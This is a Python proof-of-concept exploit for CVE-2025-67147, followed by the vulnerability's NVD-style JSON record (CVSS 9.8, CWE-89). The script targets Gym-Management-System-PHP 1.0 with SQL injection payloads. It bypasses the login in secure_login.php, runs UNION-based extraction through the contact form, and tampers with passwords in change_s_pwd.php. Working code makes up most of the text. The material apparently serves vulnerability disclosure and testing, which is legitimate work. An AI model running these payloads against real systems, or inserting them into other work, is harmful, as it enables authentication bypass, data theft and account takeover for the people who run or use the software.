CVE-2025-67147

''' CVE-2025-67147 SQL Injection PoC Target: Gym-Management-System-PHP 1.0 Vulnerable Files: submit_contact.php, secure_login.php, change_s_pwd.php ''' import requests import sys TARGET = "http://target.com/gym-system/" # PoC 1: Authentication Bypass in secure_login.php def bypass_auth(): """Bypass login authentication using SQL injection""" endpoint = f"{TARGET}secure_login.php" payload = { "username": "admin' OR '1'='1' --", "pass_key": "any" } print("[+] Attempting authentication bypass...") response = requests.post(endpoint, data=payload) if "dashboard" in response.text.lower() or response.status_code == 302: print("[+] Authentication bypass successful!") return response # PoC 2: SQL Injection in submit_contact.php def inject_contact_form(): """Extract database information via contact form""" endpoint = f"{TARGET}submit_contact.php" # UNION-based injection to extract data payload = { "name": "test' UNION SELECT 1,2,version(),user(),5,6 -- ", "email": "[email protected]", "comment": "test" } print("[+] Sending SQL injection payload to contact form...") response = requests.post(endpoint, data=payload) print(f"[+] Response Status: {response.status_code}") return response # PoC 3: SQL Injection in change_s_pwd.php def inject_password_change(): """Modify user passwords via SQL injection""" endpoint = f"{TARGET}change_s_pwd.php" payload = { "login_id": "1' OR '1'='1", "pwfield": "newpassword", "login_key": "123" } print("[+] Attempting password change injection...") response = requests.post(endpoint, data=payload) return response if __name__ == "__main__": print("=" * 50) print("CVE-2025-67147 SQL Injection PoC") print("=" * 50) try: bypass_auth() inject_contact_form() inject_password_change() except Exception as e: print(f"[-] Error: {e}")

{"cve": {"id": "CVE-2025-67147", "sourceIdentifier": "[email protected]", "published": "2026-01-12T21:15:59.133", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple SQL Injection vulnerabilities exist in amansuryawanshi Gym-Management-System-PHP 1.0 via the 'name', 'email', and 'comment' parameters in (1) submit_contact.php, the 'username' and 'pass_key' parameters in (2) secure_login.php, and the 'login_id', 'pwfield', and 'login_key' parameters in (3) change_s_pwd.php. An unauthenticated or authenticated attacker can exploit these issues to bypass authentication, execute arbitrary SQL commands, modify database records, delete data, or escalate privileges to administrator level."}, {"lang": "es", "value": "Existen múltiples vulnerabilidades de inyección SQL en amansuryawanshi Gym-Management-System-PHP 1.0 a través de los parámetros 'name', 'email' y 'comment' en (1) submit_contact.php, los parámetros 'username' y 'pass_key' en (2) secure_login.php, y los parámetros 'login_id', 'pwfield' y 'login_key' en (3) change_s_pwd.php. Un atacante no autenticado o autenticado puede explotar estos problemas para omitir la autenticación, ejecutar comandos SQL arbitrarios, modificar registros de la base de datos, eliminar datos o escalar privilegios a nivel de administrador."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/amansuryawanshi/Gym-Management-System-PHP/issues/3", "source": "[email protected]"}]}}